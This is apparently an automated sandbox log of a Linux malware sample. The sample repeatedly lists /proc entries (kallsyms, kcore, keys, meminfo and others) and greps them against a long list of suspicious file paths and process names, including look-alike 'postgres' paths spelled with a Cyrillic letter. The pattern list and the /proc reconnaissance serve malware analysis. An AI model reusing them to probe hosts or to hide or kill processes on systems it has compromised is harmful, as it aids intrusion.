/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1237
-
-
/bin/grepgrep exe2⤵PID:1240
-
-
/bin/lsls -latrh /proc/irq2⤵PID:1239
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1242
-
-
/bin/grepgrep exe2⤵PID:1245
-
-
/bin/lsls -latrh /proc/kallsyms2⤵PID:1244
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1247
-
-
/bin/grepgrep exe2⤵PID:1250
-
-
/bin/lsls -latrh /proc/kcore2⤵PID:1249
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1252
-
-
/bin/grepgrep exe2⤵PID:1255
-
-
/bin/lsls -latrh /proc/keys2⤵PID:1254
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1257
-
-
/bin/grepgrep exe2⤵PID:1260
-
-
/bin/lsls -latrh /proc/key-users2⤵PID:1259
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1262
-
-
/bin/grepgrep exe2⤵PID:1265
-
-
/bin/lsls -latrh /proc/kmsg2⤵PID:1264
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1269
-
-
/bin/grepgrep exe2⤵PID:1272
-
-
/bin/lsls -latrh /proc/kpagecgroup2⤵PID:1271
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1275
-
-
/bin/grepgrep exe2⤵PID:1279
-
-
/bin/lsls -latrh /proc/kpagecount2⤵PID:1278
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1281
-
-
/bin/grepgrep exe2⤵PID:1285
-
-
/bin/lsls -latrh /proc/kpageflags2⤵PID:1284
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1288
-
-
/bin/grepgrep exe2⤵PID:1291
-
-
/bin/lsls -latrh /proc/loadavg2⤵PID:1290
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1295
-
-
/bin/grepgrep exe2⤵PID:1298
-
-
/bin/lsls -latrh /proc/locks2⤵PID:1297
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1301
-
-
/bin/grepgrep exe2⤵PID:1305
-
-
/bin/lsls -latrh /proc/meminfo2⤵PID:1304
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1307
-
-
/bin/grepgrep exe2⤵PID:1312
-
-
/bin/lsls -latrh /proc/misc2⤵PID:1311
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1314
-
-
/bin/grepgrep exe2⤵PID:1318
-
-
/bin/lsls -latrh /proc/modules2⤵PID:1317
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1321
-
-
/bin/grepgrep exe2⤵PID:1324
-
-
/bin/lsls -latrh /proc/mounts2⤵PID:1323
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1327
-
-
/bin/grepgrep exe2⤵PID:1331
-
-
/bin/lsls -latrh /proc/net2⤵PID:1330
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1333
-
-
/bin/grepgrep exe2⤵PID:1337
-
-
/bin/lsls -latrh /proc/pagetypeinfo2⤵PID:1336
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1340
-
-
/bin/grepgrep exe2⤵PID:1343
-
-
/bin/lsls -latrh /proc/partitions2⤵PID:1342
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1346
-
-
/bin/grepgrep exe2⤵PID:1350
-
-
/bin/lsls -latrh /proc/sched_debug2⤵PID:1349
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1352
-
-
/bin/grepgrep exe2⤵PID:1356
-
-
/bin/lsls -latrh /proc/schedstat2⤵PID:1355
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1359
-
-
/bin/grepgrep exe2⤵PID:1363
-
-
/bin/lsls -latrh /proc/self2⤵PID:1362
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1366
-
-
/bin/grepgrep exe2⤵PID:1369
-
-
/bin/lsls -latrh /proc/slabinfo2⤵PID:1368
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1372
-
-
/bin/grepgrep exe2⤵PID:1376
-
-
/bin/lsls -latrh /proc/softirqs2⤵PID:1375
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1378
-
-
/bin/grepgrep exe2⤵PID:1382
-
-
/bin/lsls -latrh /proc/stat2⤵PID:1381
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1385
-
-
/bin/grepgrep exe2⤵PID:1389
-
-
/bin/lsls -latrh /proc/swaps2⤵PID:1388
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1392
-
-
/bin/grepgrep exe2⤵PID:1395
-
-
/bin/lsls -latrh /proc/sys2⤵PID:1394
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1397
-
-
/bin/grepgrep exe2⤵PID:1400
-
-
/bin/lsls -latrh /proc/sysrq-trigger2⤵PID:1399
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1402
-
-
/bin/grepgrep exe2⤵PID:1405
-
-
/bin/lsls -latrh /proc/sysvipc2⤵
- System Network Configuration Discovery
PID:1404
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1407
-
-
/bin/grepgrep exe2⤵PID:1410
-
-
/bin/lsls -latrh /proc/thread-self2⤵PID:1409
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1412
-
-
/bin/grepgrep exe2⤵PID:1415
-
-
/bin/lsls -latrh /proc/timer_list2⤵PID:1414
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1417
-
-
/bin/grepgrep exe2⤵PID:1420
-
-
/bin/lsls -latrh /proc/tty2⤵PID:1419
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1422
-
-
/bin/grepgrep exe2⤵PID:1425
-
-
/bin/lsls -latrh /proc/uptime2⤵PID:1424
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1427
-
-
/bin/grepgrep exe2⤵PID:1430
-
-
/bin/lsls -latrh /proc/version2⤵PID:1429
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1432
-
-
/bin/grepgrep exe2⤵PID:1435
-
-
/bin/lsls -latrh /proc/vmallocinfo2⤵PID:1434
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1437
-
-
/bin/grepgrep exe2⤵PID:1440
-
-
/bin/lsls -latrh /proc/vmstat2⤵PID:1439
-
-
